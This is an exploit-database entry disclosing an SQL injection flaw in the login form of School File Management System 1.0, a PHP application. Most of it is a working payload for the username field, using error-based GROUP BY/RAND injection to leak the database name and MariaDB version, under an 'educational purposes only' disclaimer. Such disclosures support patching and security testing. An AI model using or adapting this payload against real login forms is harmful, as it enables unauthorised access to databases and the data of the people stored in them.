School file management system 1.0 username sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-05-07 |
Type : webapps |
Platform : php
This exploit / vulnerability School file management system 1.0 username sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: School File Management System 1.0 - 'username' SQL Injection
# Date: 2020-05-04
# Exploit Author: Tarun Sehgal
# Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login=
//Comment
Above request will print database name and MariaDB version.
School file management system 1.0 username sql injection